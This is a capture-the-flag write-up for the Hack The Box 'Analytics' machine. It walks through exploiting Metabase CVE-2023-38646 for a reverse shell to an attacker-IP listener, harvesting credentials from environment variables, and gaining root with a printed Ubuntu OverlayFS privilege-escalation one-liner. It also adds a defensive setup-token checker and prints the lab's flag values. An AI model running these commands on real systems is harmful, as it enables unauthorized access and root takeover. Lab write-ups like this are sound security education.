[HTB] Analytics

OS: Linux
Difficulty: Easy
Author: 7u9y & TheCyberGeek
Release Date: October 7, 2023

Recon

nmap

$ nmap -sC -sV 10.10.11.233

[screenshot: nmap scan]

We can see an HTTP service running on port 80.
We also add the domain to the /etc/hosts file.

[screenshot: /etc/hosts]

Web Page

After looking around the website, pressing the login button took me to the data.analytical.htb subdomain.
So we update the hosts file again and get a login page.

[screenshot: login page URL]
[screenshot: /etc/hosts, second entry]

The login page:
[screenshot: login page]

After searching for a Metabase exploit, I came across CVE-2023-38646.

This vulnerability allows code execution without any authentication.

Exploit

setup-token

We head to the URL specified in the previous link (data.analytical.htb/api/sessions/properties) and search for setup-token.

[screenshot: setup-token in the properties response]
As we can see, the setup-token is exposed, which means the instance is vulnerable to the exploit.
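The manual check above reads the unauthenticated properties endpoint and looks for "setup-token". As an added example (not part of the original writeup), the script below does the same check programmatically so an administrator can verify their own Metabase instance; it assumes the endpoint path /api/session/properties and the JSON keys "setup-token" and "has-user-setup", and the sample responses are constructed, not captured from the machine.

```python
"""Check whether a Metabase instance still discloses its setup-token."""
import json
import sys
import urllib.request


def assess_properties(props: dict) -> dict:
    """Classify a parsed /api/session/properties response.

    The condition the writeup relies on is: first-run setup is already
    complete ("has-user-setup" is true) but "setup-token" is still present
    in the unauthenticated response.  A token during a genuinely unfinished
    setup is expected; a token after setup is the exposure to fix.
    """
    token = props.get("setup-token")  # assumed key name
    setup_done = bool(props.get("has-user-setup"))  # assumed key name
    exposed = token is not None and token != ""
    if exposed and setup_done:
        verdict = "EXPOSED: setup complete but setup-token still served unauthenticated"
    elif exposed:
        verdict = "SETUP PENDING: token present because first-run setup is unfinished"
    else:
        verdict = "OK: setup-token is not disclosed"
    return {"exposed": exposed, "setup_done": setup_done, "verdict": verdict}


def fetch_properties(base_url: str, timeout: float = 10.0) -> dict:
    """GET the properties endpoint of the instance you administer and parse it."""
    url = base_url.rstrip("/") + "/api/session/properties"  # assumed path
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


# Constructed sample responses (hypothetical values, not from the target).
SAMPLE_VULNERABLE = {"setup-token": "00000000-0000-4000-8000-000000000000",
                     "has-user-setup": True}
SAMPLE_PATCHED = {"setup-token": None, "has-user-setup": True}

if __name__ == "__main__":
    if len(sys.argv) == 2:
        # Usage: python3 check_setup_token.py https://metabase.example.internal
        print(assess_properties(fetch_properties(sys.argv[1]))["verdict"])
    else:
        for sample in (SAMPLE_VULNERABLE, SAMPLE_PATCHED):
            print(assess_properties(sample)["verdict"])
```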

Run the exploit

Download the exploit

Set up a netcat listener.

$ nc -lvnp 1234

While the listener is running, run the exploit:

$ python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost <Attacker IP> --lport 1234

After the exploit runs, we get a shell as the user metabase.
[screenshot: shell]

Docker Container

We are now in a Docker container.
However, if we check the environment variables, we find a username and password.

$ env

[screenshot: env output]

SSH and user flag

We can now use the obtained credentials to SSH in as the user metalytics.

$ ssh metalytics@10.10.11.233

We are now logged in as metalytics.

$ whoami
metalytics

We can now read the user.txt flag.

$ cat /home/metalytics/user.txt
a6c6422a0c214ffd37f50a632abeb48d

PrivEsc

Ubuntu LPE

No sudo commands can be run.
I searched for exploits for the running OS version, which is 22.04.2-Ubuntu.

$ uname -a

[screenshot: Ubuntu version]

I found this Ubuntu LPE exploit.

First I tried running the command "id" to see whether it would come back as root.

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("id")'

[screenshot: root uid]
We got the root id, which means the command is being executed as root.

So I change the command to run a bash shell instead:

unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

We now have a shell as root.

$ whoami
root

All that is left is to read the root flag.

$ cat /root/root.txt
e7cea9c28a9c3460c2fd69964833561b